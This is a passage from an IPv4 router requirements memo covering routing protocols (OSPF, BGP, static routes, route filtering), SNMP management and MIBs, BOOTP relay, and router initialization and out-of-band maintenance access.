o The requirements concerning the Maximum Segment Size Option in
[INTRO:2] are amended as follows: a router that implements the
host portion of MTU discovery (discussed in Section [4.2.3.3] of
this memo) uses 536 as the default value of SendMSS only if the
path MTU is unknown; if the path MTU is known, the default value
for SendMSS is the path MTU - 40.

o The requirements concerning the Maximum Segment Size Option in
[INTRO:2] are amended as follows: ICMP Destination Unreachable
codes 11 and 12 are additional soft error conditions. Therefore,
these message MUST NOT cause TCP to abort a connection.

DISCUSSION
It should particularly be noted that a TCP implementation in a
router must conform to the following requirements of [INTRO:2]:

o Providing a configurable TTL. [Time to Live: RFC-793 Section
3.9]

o Providing an interface to configure keep-alive behavior, if
keep-alives are used at all. [TCP Keep-Alives]

o Providing an error reporting mechanism, and the ability to
manage it. [Asynchronous Reports]

o Specifying type of service. [Type-of-Service]

The general paradigm applied is that if a particular interface is
visible outside the router, then all requirements for the
interface must be followed. For example, if a router provides a
telnet function, then it will be generating traffic, likely to be
routed in the external networks. Therefore, it must be able to
set the type of service correctly or else the telnet traffic may
not get through.

7. APPLICATION LAYER - ROUTING PROTOCOLS

7.1 INTRODUCTION

For technical, managerial, and sometimes political reasons, the
Internet routing system consists of two components - interior routing
and exterior routing. The concept of an Autonomous System (AS), as
define in Section 2.2.4 of this document, plays a key role in
separating interior from an exterior routing, as this concept allows
to deliniate the set of routers where a change from interior to
exterior routing occurs. An IP datagram may have to traverse the
routers of two or more Autonomous Systems to reach its destination,
and the Autonomous Systems must provide each other with topology
information to allow such forwarding. Interior gateway protocols
(IGPs) are used to distribute routing information within an AS (i.e.,
intra-AS routing). Exterior gateway protocols are used to exchange
routing information among ASs (i.e., inter-AS routing).

7.1.1 Routing Security Considerations

Routing is one of the few places where the Robustness Principle (be
liberal in what you accept) does not apply. Routers should be
relatively suspicious in accepting routing data from other routing
systems.

A router SHOULD provide the ability to rank routing information
sources from most trustworthy to least trustworthy and to accept
routing information about any particular destination from the most
trustworthy sources first. This was implicit in the original
core/stub autonomous system routing model using EGP and various
interior routing protocols. It is even more important with the
demise of a central, trusted core.

A router SHOULD provide a mechanism to filter out obviously invalid
routes (such as those for net 127).

Routers MUST NOT by default redistribute routing data they do not
themselves use, trust or otherwise consider valid. In rare cases, it
may be necessary to redistribute suspicious information, but this
should only happen under direct intercession by some human agency.

Routers must be at least a little paranoid about accepting routing
data from anyone, and must be especially careful when they distribute
routing information provided to them by another party. See below for
specific guidelines.

7.1.2 Precedence

Except where the specification for a particular routing protocol
specifies otherwise, a router SHOULD set the IP Precedence value for
IP datagrams carrying routing traffic it originates to 6
(INTERNETWORK CONTROL).

DISCUSSION
Routing traffic with VERY FEW exceptions should be the highest
precedence traffic on any network. If a system's routing traffic
can't get through, chances are nothing else will.

7.1.3 Message Validation

Peer-to-peer authentication involves several tests. The application
of message passwords and explicit acceptable neighbor lists has in
the past improved the robustness of the route database. Routers
SHOULD IMPLEMENT management controls that enable explicit listing of
valid routing neighbors. Routers SHOULD IMPLEMENT peer-to-peer
authentication for those routing protocols that support them.

Routers SHOULD validate routing neighbors based on their source
address and the interface a message is received on; neighbors in a
directly attached subnet SHOULD be restricted to communicate with the
router via the interface that subnet is posited on or via unnumbered
interfaces. Messages received on other interfaces SHOULD be silently
discarded.

DISCUSSION
Security breaches and numerous routing problems are avoided by
this basic testing.

7.2 INTERIOR GATEWAY PROTOCOLS

7.2.1 INTRODUCTION

An Interior Gateway Protocol (IGP) is used to distribute routing
information between the various routers in a particular AS.
Independent of the algorithm used to implement a particular IGP, it
should perform the following functions:

(1) Respond quickly to changes in the internal topology of an AS

(2) Provide a mechanism such that circuit flapping does not cause
continuous routing updates

(3) Provide quick convergence to loop-free routing

(4) Utilize minimal bandwidth

(5) Provide equal cost routes to enable load-splitting

(6) Provide a means for authentication of routing updates

Current IGPs used in the internet today are characterized as either
being based on a distance-vector or a link-state algorithm.

Several IGPs are detailed in this section, including those most
commonly used and some recently developed protocols that may be
widely used in the future. Numerous other protocols intended for use
in intra-AS routing exist in the Internet community.

A router that implements any routing protocol (other than static
routes) MUST IMPLEMENT OSPF (see Section [7.2.2]). A router MAY
implement additional IGPs.

7.2.2 OPEN SHORTEST PATH FIRST - OSPF

Shortest Path First (SPF) based routing protocols are a class of
link-state algorithms that are based on the shortest-path algorithm
of Dijkstra. Although SPF based algorithms have been around since
the inception of the ARPANET, it is only recently that they have
achieved popularity both inside both the IP and the OSI communities.
In an SPF based system, each router obtains the entire topology
database through a process known as flooding. Flooding insures a
reliable transfer of the information. Each router then runs the SPF
algorithm on its database to build the IP routing table. The OSPF
routing protocol is an implementation of an SPF algorithm. The
current version, OSPF version 2, is specified in [ROUTE:1]. Note
that RFC-1131, which describes OSPF version 1, is obsolete.

Note that to comply with Section [8.3] of this memo, a router that
implements OSPF MUST implement the OSPF MIB [MGT:14].

7.2.3 INTERMEDIATE SYSTEM TO INTERMEDIATE SYSTEM - DUAL IS-IS

The American National Standards Institute (ANSI) X3S3.3 committee has
defined an intra-domain routing protocol. This protocol is titled
Intermediate System to Intermediate System Routeing Exchange
Protocol.

Its application to an IP network has been defined in [ROUTE:2], and
is referred to as Dual IS-IS (or sometimes as Integrated IS-IS).
IS-IS is based on a link-state (SPF) routing algorithm and shares all
the advantages for this class of protocols.

7.3 EXTERIOR GATEWAY PROTOCOLS

7.3.1 INTRODUCTION

Exterior Gateway Protocols are utilized for inter-Autonomous System
routing to exchange reachability information for a set of networks
internal to a particular autonomous system to a neighboring
autonomous system.

The area of inter-AS routing is a current topic of research inside
the Internet Engineering Task Force. The Exterior Gateway Protocol
(EGP) described in Section [Appendix F.1] has traditionally been the
inter-AS protocol of choice, but is now historical. The Border
Gateway Protocol (BGP) eliminates many of the restrictions and
limitations of EGP, and is therefore growing rapidly in popularity.
A router is not required to implement any inter-AS routing protocol.
However, if a router does implement EGP it also MUST IMPLEMENT BGP.
Although it was not designed as an exterior gateway protocol, RIP
(described in Section [7.2.4]) is sometimes used for inter-AS
routing.

7.3.2 BORDER GATEWAY PROTOCOL - BGP

7.3.2.1 Introduction

The Border Gateway Protocol (BGP-4) is an inter-AS routing protocol
that exchanges network reachability information with other BGP
speakers. The information for a network includes the complete list
of ASs that traffic must transit to reach that network. This
information can then be used to insure loop-free paths. This
information is sufficient to construct a graph of AS connectivity
from which routing loops may be pruned and some policy decisions at
the AS level may be enforced.

BGP is defined by [ROUTE:4]. [ROUTE:5] specifies the proper usage of
BGP in the Internet, and provides some useful implementation hints
and guidelines. [ROUTE:12] and [ROUTE:13] provide additional useful
information.

To comply with Section [8.3] of this memo, a router that implements
BGP is required to implement the BGP MIB [MGT:15].

To characterize the set of policy decisions that can be enforced
using BGP, one must focus on the rule that an AS advertises to its
neighbor ASs only those routes that it itself uses. This rule
reflects the hop-by-hop routing paradigm generally used throughout
the current Internet. Note that some policies cannot be supported by
the hop-by-hop routing paradigm and thus require techniques such as

source routing to enforce. For example, BGP does not enable one AS
to send traffic to a neighbor AS intending that traffic take a
different route from that taken by traffic originating in the
neighbor AS. On the other hand, BGP can support any policy
conforming to the hop-by-hop routing paradigm.

Implementors of BGP are strongly encouraged to follow the
recommendations outlined in Section 6 of [ROUTE:5].

7.3.2.2 Protocol Walk-through

While BGP provides support for quite complex routing policies (as an
example see Section 4.2 in [ROUTE:5]), it is not required for all BGP
implementors to support such policies. At a minimum, however, a BGP
implementation:

(1) SHOULD allow an AS to control announcements of the BGP learned
routes to adjacent AS's. Implementations SHOULD support such
control with at least the granularity of a single network.
Implementations SHOULD also support such control with the
granularity of an autonomous system, where the autonomous system
may be either the autonomous system that originated the route,
or the autonomous system that advertised the route to the local
system (adjacent autonomous system).

(2) SHOULD allow an AS to prefer a particular path to a destination
(when more than one path is available). Such function SHOULD be
implemented by allowing system administrator to assign weights
to Autonomous Systems, and making route selection process to
select a route with the lowest weight (where weight of a route
is defined as a sum of weights of all AS's in the AS_PATH path
attribute associated with that route).

(3) SHOULD allow an AS to ignore routes with certain AS's in the
AS_PATH path attribute. Such function can be implemented by
using technique outlined in (2), and by assigning infinity as
weights for such AS's. The route selection process must ignore
routes that have weight equal to infinity.

7.3.3 INTER-AS ROUTING WITHOUT AN EXTERIOR PROTOCOL

It is possible to exchange routing information between two autonomous
systems or routing domains without using a standard exterior routing
protocol between two separate, standard interior routing protocols.
The most common way of doing this is to run both interior protocols
independently in one of the border routers with an exchange of route
information between the two processes.

As with the exchange of information from an EGP to an IGP, without
appropriate controls these exchanges of routing information between
two IGPs in a single router are subject to creation of routing loops.

7.4 STATIC ROUTING

Static routing provides a means of explicitly defining the next hop
from a router for a particular destination. A router SHOULD provide
a means for defining a static route to a destination, where the
destination is defined by a network prefix. The mechanism SHOULD
also allow for a metric to be specified for each static route.

A router that supports a dynamic routing protocol MUST allow static
routes to be defined with any metric valid for the routing protocol
used. The router MUST provide the ability for the user to specify a
list of static routes that may or may not be propagated through the
routing protocol. In addition, a router SHOULD support the following
additional information if it supports a routing protocol that could
make use of the information. They are:

o TOS,

o Subnet Mask, or

o Prefix Length, or

o A metric specific to a given routing protocol that can import the
route.

DISCUSSION
We intend that one needs to support only the things useful to the
given routing protocol. The need for TOS should not require the
vendor to implement the other parts if they are not used.

Whether a router prefers a static route over a dynamic route (or
vice versa) or whether the associated metrics are used to choose
between conflicting static and dynamic routes SHOULD be
configurable for each static route.

A router MUST allow a metric to be assigned to a static route for
each routing domain that it supports. Each such metric MUST be
explicitly assigned to a specific routing domain. For example:

route 10.0.0.0/8 via 192.0.2.3 rip metric 3

route 10.21.0.0/16 via 192.0.2.4 ospf inter-area metric 27

route 10.22.0.0/16 via 192.0.2.5 egp 123 metric 99

DISCUSSION
It has been suggested that, ideally, static routes should have
preference values rather than metrics (since metrics can only be
compared with metrics of other routes in the same routing domain,
the metric of a static route could only be compared with metrics
of other static routes). This is contrary to some current
implementations, where static routes really do have metrics, and
those metrics are used to determine whether a particular dynamic
route overrides the static route to the same destination. Thus,
this document uses the term metric rather than preference.

This technique essentially makes the static route into a RIP
route, or an OSPF route (or whatever, depending on the domain of
the metric). Thus, the route lookup algorithm of that domain
applies. However, this is NOT route leaking, in that coercing a
static route into a dynamic routing domain does not authorize the
router to redistribute the route into the dynamic routing domain.

For static routes not put into a specific routing domain, the
route lookup algorithm is:

(1) Basic match

(2) Longest match

(3) Weak TOS (if TOS supported)

(4) Best metric (where metric are implementation-defined)

The last step may not be necessary, but it's useful in the case
where you want to have a primary static route over one interface
and a secondary static route over an alternate interface, with
failover to the alternate path if the interface for the primary
route fails.

7.5 FILTERING OF ROUTING INFORMATION

Each router within a network makes forwarding decisions based upon
information contained within its forwarding database. In a simple
network the contents of the database may be configured statically.
As the network grows more complex, the need for dynamic updating of
the forwarding database becomes critical to the efficient operation
of the network.

If the data flow through a network is to be as efficient as possible,
it is necessary to provide a mechanism for controlling the
propagation of the information a router uses to build its forwarding
database. This control takes the form of choosing which sources of

routing information should be trusted and selecting which pieces of
the information to believe. The resulting forwarding database is a
filtered version of the available routing information.

In addition to efficiency, controlling the propagation of routing
information can reduce instability by preventing the spread of
incorrect or bad routing information.

In some cases local policy may require that complete routing
information not be widely propagated.

These filtering requirements apply only to non-SPF-based protocols
(and therefore not at all to routers which don't implement any
distance vector protocols).

7.5.1 Route Validation

A router SHOULD log as an error any routing update advertising a
route that violates the specifications of this memo, unless the
routing protocol from which the update was received uses those values
to encode special routes (such as default routes).

7.5.2 Basic Route Filtering

Filtering of routing information allows control of paths used by a
router to forward packets it receives. A router should be selective
in which sources of routing information it listens to and what routes
it believes. Therefore, a router MUST provide the ability to
specify:

o On which logical interfaces routing information will be accepted
and which routes will be accepted from each logical interface.

o Whether all routes or only a default route is advertised on a
logical interface.

Some routing protocols do not recognize logical interfaces as a
source of routing information. In such cases the router MUST provide
the ability to specify

o from which other routers routing information will be accepted.

For example, assume a router connecting one or more leaf networks to
the main portion or backbone of a larger network. Since each of the
leaf networks has only one path in and out, the router can simply
send a default route to them. It advertises the leaf networks to the
main network.

7.5.3 Advanced Route Filtering

As the topology of a network grows more complex, the need for more
complex route filtering arises. Therefore, a router SHOULD provide
the ability to specify independently for each routing protocol:

o Which logical interfaces or routers routing information (routes)
will be accepted from and which routes will be believed from each
other router or logical interface,

o Which routes will be sent via which logical interface(s), and

o Which routers routing information will be sent to, if this is
supported by the routing protocol in use.

In many situations it is desirable to assign a reliability ordering
to routing information received from another router instead of the
simple believe or don't believe choice listed in the first bullet
above. A router MAY provide the ability to specify:

o A reliability or preference to be assigned to each route received.
A route with higher reliability will be chosen over one with lower
reliability regardless of the routing metric associated with each
route.

If a router supports assignment of preferences, the router MUST NOT
propagate any routes it does not prefer as first party information.
If the routing protocol being used to propagate the routes does not
support distinguishing between first and third party information, the
router MUST NOT propagate any routes it does not prefer.

DISCUSSION
For example, assume a router receives a route to network C from
router R and a route to the same network from router S. If router
R is considered more reliable than router S traffic destined for
network C will be forwarded to router R regardless of the route
received from router S.

Routing information for routes which the router does not use (router
S in the above example) MUST NOT be passed to any other router.

7.6 INTER-ROUTING-PROTOCOL INFORMATION EXCHANGE

Routers MUST be able to exchange routing information between separate
IP interior routing protocols, if independent IP routing processes
can run in the same router. Routers MUST provide some mechanism for
avoiding routing loops when routers are configured for bi-directional
exchange of routing information between two separate interior routing

processes. Routers MUST provide some priority mechanism for choosing
routes from independent routing processes. Routers SHOULD provide
administrative control of IGP-IGP exchange when used across
administrative boundaries.

Routers SHOULD provide some mechanism for translating or transforming
metrics on a per network basis. Routers (or routing protocols) MAY
allow for global preference of exterior routes imported into an IGP.

DISCUSSION
Different IGPs use different metrics, requiring some translation
technique when introducing information from one protocol into
another protocol with a different form of metric. Some IGPs can
run multiple instances within the same router or set of routers.
In this case metric information can be preserved exactly or
translated.

There are at least two techniques for translation between
different routing processes. The static (or reachability)
approach uses the existence of a route advertisement in one IGP to
generate a route advertisement in the other IGP with a given
metric. The translation or tabular approach uses the metric in
one IGP to create a metric in the other IGP through use of either
a function (such as adding a constant) or a table lookup.

Bi-directional exchange of routing information is dangerous
without control mechanisms to limit feedback. This is the same
problem that distance vector routing protocols must address with
the split horizon technique and that EGP addresses with the
third-party rule. Routing loops can be avoided explicitly through
use of tables or lists of permitted/denied routes or implicitly
through use of a split horizon rule, a no-third-party rule, or a
route tagging mechanism. Vendors are encouraged to use implicit
techniques where possible to make administration easier for
network operators.

8. APPLICATION LAYER - NETWORK MANAGEMENT PROTOCOLS

Note that this chapter supersedes any requirements stated under
"REMOTE MANAGEMENT" in [INTRO:3].

8.1 The Simple Network Management Protocol - SNMP

8.1.1 SNMP Protocol Elements

Routers MUST be manageable by SNMP [MGT:3]. The SNMP MUST operate
using UDP/IP as its transport and network protocols. Others MAY be
supported (e.g., see [MGT:25, MGT:26, MGT:27, and MGT:28]). SNMP

management operations MUST operate as if the SNMP was implemented on
the router itself. Specifically, management operations MUST be
effected by sending SNMP management requests to any of the IP
addresses assigned to any of the router's interfaces. The actual
management operation may be performed either by the router or by a
proxy for the router.

DISCUSSION
This wording is intended to allow management either by proxy,
where the proxy device responds to SNMP packets that have one of
the router's IP addresses in the packets destination address
field, or the SNMP is implemented directly in the router itself
and receives packets and responds to them in the proper manner.

It is important that management operations can be sent to one of
the router's IP Addresses. In diagnosing network problems the
only thing identifying the router that is available may be one of
the router's IP address; obtained perhaps by looking through
another router's routing table.

All SNMP operations (get, get-next, get-response, set, and trap) MUST
be implemented.

Routers MUST provide a mechanism for rate-limiting the generation of
SNMP trap messages. Routers MAY provide this mechanism through the
algorithms for asynchronous alert management described in [MGT:5].

DISCUSSION
Although there is general agreement about the need to rate-limit
traps, there is not yet consensus on how this is best achieved.
The reference cited is considered experimental.

8.2 Community Table

For the purposes of this specification, we assume that there is an
abstract `community table' in the router. This table contains
several entries, each entry for a specific community and containing
the parameters necessary to completely define the attributes of that
community. The actual implementation method of the abstract
community table is, of course, implementation specific.

A router's community table MUST allow for at least one entry and
SHOULD allow for at least two entries.

DISCUSSION
A community table with zero capacity is useless. It means that
the router will not recognize any communities and, therefore, all
SNMP operations will be rejected.

Therefore, one entry is the minimal useful size of the table.
Having two entries allows one entry to be limited to read-only
access while the other would have write capabilities.

Routers MUST allow the user to manually (i.e., without using SNMP)
examine, add, delete and change entries in the SNMP community table.
The user MUST be able to set the community name or construct a MIB
view. The user MUST be able to configure communities as read-only
(i.e., they do not allow SETs) or read-write (i.e., they do allow
SETs).

The user MUST be able to define at least one IP address to which
notifications are sent for each community or MIB view, if traps are
used. These addresses SHOULD be definable on a community or MIB view
basis. It SHOULD be possible to enable or disable notifications on a
community or MIB view basis.

A router SHOULD provide the ability to specify a list of valid
network managers for any particular community. If enabled, a router
MUST validate the source address of the SNMP datagram against the
list and MUST discard the datagram if its address does not appear.
If the datagram is discarded the router MUST take all actions
appropriate to an SNMP authentication failure.

DISCUSSION
This is a rather limited authentication system, but coupled with
various forms of packet filtering may provide some small measure
of increased security.

The community table MUST be saved in non-volatile storage.

The initial state of the community table SHOULD contain one entry,
with the community name string public and read-only access. The
default state of this entry MUST NOT send traps. If it is
implemented, then this entry MUST remain in the community table until
the administrator changes it or deletes it.

DISCUSSION
By default, traps are not sent to this community. Trap PDUs are
sent to unicast IP addresses. This address must be configured
into the router in some manner. Before the configuration occurs,
there is no such address, so to whom should the trap be sent?
Therefore trap sending to the public community defaults to be
disabled. This can, of course, be changed by an administrative
operation once the router is operational.

8.3 Standard MIBS

All MIBS relevant to a router's configuration are to be implemented.
To wit:

o The System, Interface, IP, ICMP, and UDP groups of MIB-II [MGT:2]
MUST be implemented.

o The Interface Extensions MIB [MGT:18] MUST be implemented.

o The IP Forwarding Table MIB [MGT:20] MUST be implemented.

o If the router implements TCP (e.g., for Telnet) then the TCP group
of MIB-II [MGT:2] MUST be implemented.

o If the router implements EGP then the EGP group of MIB-II [MGT:2]
MUST be implemented.

o If the router supports OSPF then the OSPF MIB [MGT:14] MUST be
implemented.

o If the router supports BGP then the BGP MIB [MGT:15] MUST be
implemented.

o If the router has Ethernet, 802.3, or StarLan interfaces then the
Ethernet-Like MIB [MGT:6] MUST be implemented.

o If the router has 802.4 interfaces then the 802.4 MIB [MGT:7] MUST
be implemented.

o If the router has 802.5 interfaces then the 802.5 MIB [MGT:8] MUST
be implemented.

o If the router has FDDI interfaces that implement ANSI SMT 7.3 then
the FDDI MIB [MGT:9] MUST be implemented.

o If the router has FDDI interfaces that implement ANSI SMT 6.2 then
the FDDI MIB [MGT:29] MUST be implemented.

o If the router has interfaces that use V.24 signalling, such as RS-
232, V.10, V.11, V.35, V.36, or RS-422/423/449, then the RS-232
[MGT:10] MIB MUST be implemented.

o If the router has T1/DS1 interfaces then the T1/DS1 MIB [MGT:16]
MUST be implemented.

o If the router has T3/DS3 interfaces then the T3/DS3 MIB [MGT:17]
MUST be implemented.

o If the router has SMDS interfaces then the SMDS Interface Protocol
MIB [MGT:19] MUST be implemented.

o If the router supports PPP over any of its interfaces then the PPP
MIBs [MGT:11], [MGT:12], and [MGT:13] MUST be implemented.

o If the router supports RIP Version 2 then the RIP Version 2 MIB
[MGT:21] MUST be implemented.

o If the router supports X.25 over any of its interfaces then the
X.25 MIBs [MGT:22, MGT:23 and MGT:24] MUST be implemented.

8.4 Vendor Specific MIBS

The Internet Standard and Experimental MIBs do not cover the entire
range of statistical, state, configuration and control information
that may be available in a network element. This information is,
nevertheless, extremely useful. Vendors of routers (and other
network devices) generally have developed MIB extensions that cover
this information. These MIB extensions are called Vendor Specific
MIBs.

The Vendor Specific MIB for the router MUST provide access to all
statistical, state, configuration, and control information that is
not available through the Standard and Experimental MIBs that have
been implemented. This information MUST be available for both
monitoring and control operations.

DISCUSSION
The intent of this requirement is to provide the ability to do
anything on the router through SNMP that can be done through a
console, and vice versa. A certain minimal amount of
configuration is necessary before SNMP can operate (e.g., the
router must have an IP address). This initial configuration can
not be done through SNMP. However, once the initial configuration
is done, full capabilities ought to be available through network
management.

The vendor SHOULD make available the specifications for all Vendor
Specific MIB variables. These specifications MUST conform to the SMI
[MGT:1] and the descriptions MUST be in the form specified in
[MGT:4].

DISCUSSION
Making the Vendor Specific MIB available to the user is necessary.
Without this information the users would not be able to configure
their network management systems to be able to access the Vendor
Specific parameters. These parameters would then be useless.

ne 2 The format of the MIB specification is also specified.
Parsers that read MIB specifications and generate the needed
tables for the network management station are available. These
parsers generally understand only the standard MIB specification
format.

8.5 Saving Changes

Parameters altered by SNMP MAY be saved to non-volatile storage.

DISCUSSION
Reasons why this requirement is a MAY:

o The exact physical nature of non-volatile storage is not
specified in this document. Hence, parameters may be saved in
NVRAM/EEPROM, local floppy or hard disk, or in some TFTP file
server or BOOTP server, etc. Suppose that this information is
in a file that is retrieved through TFTP. In that case, a
change made to a configuration parameter on the router would
need to be propagated back to the file server holding the
configuration file. Alternatively, the SNMP operation would
need to be directed to the file server, and then the change
somehow propagated to the router. The answer to this problem
does not seem obvious.

This also places more requirements on the host holding the
configuration information than just having an available TFTP
server, so much more that its probably unsafe for a vendor to
assume that any potential customer will have a suitable host
available.

o The timing of committing changed parameters to non-volatile
storage is still an issue for debate. Some prefer to commit
all changes immediately. Others prefer to commit changes to
non-volatile storage only upon an explicit command.

9. APPLICATION LAYER - MISCELLANEOUS PROTOCOLS

For all additional application protocols that a router implements,
the router MUST be compliant and SHOULD be unconditionally compliant
with the relevant requirements of [INTRO:3].

9.1 BOOTP

9.1.1 Introduction

The Bootstrap Protocol (BOOTP) is a UDP/IP-based protocol that allows
a booting host to configure itself dynamically and without user

supervision. BOOTP provides a means to notify a host of its assigned
IP address, the IP address of a boot server host, and the name of a
file to be loaded into memory and executed ([APPL:1]). Other
configuration information such as the local prefix length or subnet
mask, the local time offset, the addresses of default routers, and
the addresses of various Internet servers can also be communicated to
a host using BOOTP ([APPL:2]).

9.1.2 BOOTP Relay Agents

In many cases, BOOTP clients and their associated BOOTP server(s) do
not reside on the same IP (sub)network. In such cases, a third-party
agent is required to transfer BOOTP messages between clients and
servers. Such an agent was originally referred to as a BOOTP
forwarding agent. However, to avoid confusion with the IP forwarding
function of a router, the name BOOTP relay agent has been adopted
instead.

DISCUSSION
A BOOTP relay agent performs a task that is distinct from a
router's normal IP forwarding function. While a router normally
switches IP datagrams between networks more-or-less transparently,
a BOOTP relay agent may more properly be thought to receive BOOTP
messages as a final destination and then generate new BOOTP
messages as a result. One should resist the notion of simply
forwarding a BOOTP message straight through like a regular packet.

This relay-agent functionality is most conveniently located in the
routers that interconnect the clients and servers (although it may
alternatively be located in a host that is directly connected to the
client (sub)net).

A router MAY provide BOOTP relay-agent capability. If it does, it
MUST conform to the specifications in [APPL:3].

Section [5.2.3] discussed the circumstances under which a packet is
delivered locally (to the router). All locally delivered UDP
messages whose UDP destination port number is BOOTPS (67) are
considered for special processing by the router's logical BOOTP relay
agent.

Sections [4.2.2.11] and [5.3.7] discussed invalid IP source
addresses. According to these rules, a router must not forward any
received datagram whose IP source address is 0.0.0.0. However,
routers that support a BOOTP relay agent MUST accept for local
delivery to the relay agent BOOTREQUEST messages whose IP source
address is 0.0.0.0.

10. OPERATIONS AND MAINTENANCE

This chapter supersedes any requirements of [INTRO:3] relating to
"Extensions to the IP Module."

Facilities to support operation and maintenance (O&M) activities form
an essential part of any router implementation. Although these
functions do not seem to relate directly to interoperability, they
are essential to the network manager who must make the router
interoperate and must track down problems when it doesn't. This
chapter also includes some discussion of router initialization and of
facilities to assist network managers in securing and accounting for
their networks.

10.1 Introduction

The following kinds of activities are included under router O&M:

o Diagnosing hardware problems in the router's processor, in its
network interfaces, or in its connected networks, modems, or
communication lines.

o Installing new hardware

o Installing new software.

o Restarting or rebooting the router after a crash.

o Configuring (or reconfiguring) the router.

o Detecting and diagnosing Internet problems such as congestion,
routing loops, bad IP addresses, black holes, packet avalanches,
and misbehaved hosts.

o Changing network topology, either temporarily (e.g., to bypass a
communication line problem) or permanently.

o Monitoring the status and performance of the routers and the
connected networks.

o Collecting traffic statistics for use in (Inter-)network planning.

o Coordinating the above activities with appropriate vendors and
telecommunications specialists.

Routers and their connected communication lines are often operated as
a system by a centralized O&M organization. This organization may
maintain a (Inter-)network operation center, or NOC, to carry out its

O&M functions. It is essential that routers support remote control
and monitoring from such a NOC through an Internet path, since
routers might not be connected to the same network as their NOC.
Since a network failure may temporarily preclude network access, many
NOCs insist that routers be accessible for network management through
an alternative means, often dial-up modems attached to console ports
on the routers.

Since an IP packet traversing an internet will often use routers
under the control of more than one NOC, Internet problem diagnosis
will often involve cooperation of personnel of more than one NOC. In
some cases, the same router may need to be monitored by more than one
NOC, but only if necessary, because excessive monitoring could impact
a router's performance.

The tools available for monitoring at a NOC may cover a wide range of
sophistication. Current implementations include multi-window,
dynamic displays of the entire router system. The use of AI
techniques for automatic problem diagnosis is proposed for the
future.

Router O&M facilities discussed here are only a part of the large and
difficult problem of Internet management. These problems encompass
not only multiple management organizations, but also multiple
protocol layers. For example, at the current stage of evolution of
the Internet architecture, there is a strong coupling between host
TCP implementations and eventual IP-level congestion in the router
system [OPER:1]. Therefore, diagnosis of congestion problems will
sometimes require the monitoring of TCP statistics in hosts. There
are currently a number of R&D efforts in progress in the area of
Internet management and more specifically router O&M. These R&D
efforts have already produced standards for router O&M. This is also
an area in which vendor creativity can make a significant
contribution.

10.2 Router Initialization

10.2.1 Minimum Router Configuration

There exists a minimum set of conditions that must be satisfied
before a router may forward packets. A router MUST NOT enable
forwarding on any physical interface unless either:

(1) The router knows the IP address and associated subnet mask or
network prefix length of at least one logical interface
associated with that physical interface, or

(2) The router knows that the interface is an unnumbered interface
and knows its router-id.

These parameters MUST be explicitly configured:

o A router MUST NOT use factory-configured default values for its IP
addresses, prefix lengths, or router-id, and

o A router MUST NOT assume that an unconfigured interface is an
unnumbered interface.

DISCUSSION
There have been instances in which routers have been shipped with
vendor-installed default addresses for interfaces. In a few
cases, this has resulted in routers advertising these default
addresses into active networks.

10.2.2 Address and Prefix Initialization

A router MUST allow its IP addresses and their address masks or
prefix lengths to be statically configured and saved in non-volatile
storage.

A router MAY obtain its IP addresses and their corresponding address
masks dynamically as a side effect of the system initialization
process (see Section 10.2.3]);

If the dynamic method is provided, the choice of method to be used in
a particular router MUST be configurable.

As was described in Section [4.2.2.11], IP addresses are not
permitted to have the value 0 or -1 in the or

fields. Therefore, a router SHOULD NOT allow an IP
address or address mask to be set to a value that would make any of
the these fields above have the value zero or -1.

DISCUSSION
It is possible using arbitrary address masks to create situations
in which routing is ambiguous (i.e., two routes with different but
equally specific subnet masks match a particular destination
address). This is one of the strongest arguments for the use of
network prefixes, and the reason the use of discontiguous subnet
masks is not permitted.

A router SHOULD make the following checks on any address mask it
installs:

o The mask is neither all ones nor all zeroes (the prefix length is
neither zero nor 32).

o The bits which correspond to the network prefix part of the address
are all set to 1.

o The bits that correspond to the network prefix are contiguous.

DISCUSSION
The masks associated with routes are also sometimes called subnet
masks, this test should not be applied to them.

10.2.3 Network Booting using BOOTP and TFTP

There has been much discussion of how routers can and should be
booted from the network. These discussions have revolved around
BOOTP and TFTP. Currently, there are routers that boot with TFTP
from the network. There is no reason that BOOTP could not be used
for locating the server that the boot image should be loaded from.

BOOTP is a protocol used to boot end systems, and requires some
stretching to accommodate its use with routers. If a router is using
BOOTP to locate the current boot host, it should send a BOOTP Request
with its hardware address for its first interface, or, if it has been
previously configured otherwise, with either another interface's
hardware address, or another number to put in the hardware address
field of the BOOTP packet. This is to allow routers without hardware
addresses (like synchronous line only routers) to use BOOTP for
bootload discovery. TFTP can then be used to retrieve the image
found in the BOOTP Reply. If there are no configured interfaces or
numbers to use, a router MAY cycle through the interface hardware
addresses it has until a match is found by the BOOTP server.

A router SHOULD IMPLEMENT the ability to store parameters learned
through BOOTP into local non-volatile storage. A router MAY
implement the ability to store a system image loaded over the network
into local stable storage.

A router MAY have a facility to allow a remote user to request that
the router get a new boot image. Differentiation should be made
between getting the new boot image from one of three locations: the
one included in the request, from the last boot image server, and
using BOOTP to locate a server.

10.3 Operation and Maintenance

10.3.1 Introduction

There is a range of possible models for performing O&M functions on a
router. At one extreme is the local-only model, under which the O&M
functions can only be executed locally (e.g., from a terminal plugged
into the router machine). At the other extreme, the fully remote
model allows only an absolute minimum of functions to be performed
locally (e.g., forcing a boot), with most O&M being done remotely
from the NOC. There are intermediate models, such as one in which
NOC personnel can log into the router as a host, using the Telnet
protocol, to perform functions that can also be invoked locally. The
local-only model may be adequate in a few router installations, but
remote operation from a NOC is normally required, and therefore
remote O&M provisions are required for most routers.

Remote O&M functions may be exercised through a control agent
(program). In the direct approach, the router would support remote
O&M functions directly from the NOC using standard Internet protocols
(e.g., SNMP, UDP or TCP); in the indirect approach, the control agent
would support these protocols and control the router itself using
proprietary protocols. The direct approach is preferred, although
either approach is acceptable. The use of specialized host hardware
and/or software requiring significant additional investment is
discouraged; nevertheless, some vendors may elect to provide the
control agent as an integrated part of the network in which the
routers are a part. If this is the case, it is required that a means
be available to operate the control agent from a remote site using
Internet protocols and paths and with equivalent functionality with
respect to a local agent terminal.

It is desirable that a control agent and any other NOC software tools
that a vendor provides operate as user programs in a standard
operating system. The use of the standard Internet protocols UDP and
TCP for communicating with the routers should facilitate this.

Remote router monitoring and (especially) remote router control
present important access control problems that must be addressed.
Care must also be taken to ensure control of the use of router
resources for these functions. It is not desirable to let router
monitoring take more than some limited fraction of the router CPU
time, for example. On the other hand, O&M functions must receive
priority so they can be exercised when the router is congested, since
often that is when O&M is most needed.

10.3.2 Out Of Band Access

Routers MUST support Out-Of-Band (OOB) access. OOB access SHOULD
provide the same functionality as in-band access. This access SHOULD
implement access controls, to prevent unauthorized access.

DISCUSSION
This Out-Of-Band access will allow the NOC a way to access
isolated routers during times when network access is not
available.

Out-Of-Band access is an important management tool for the network
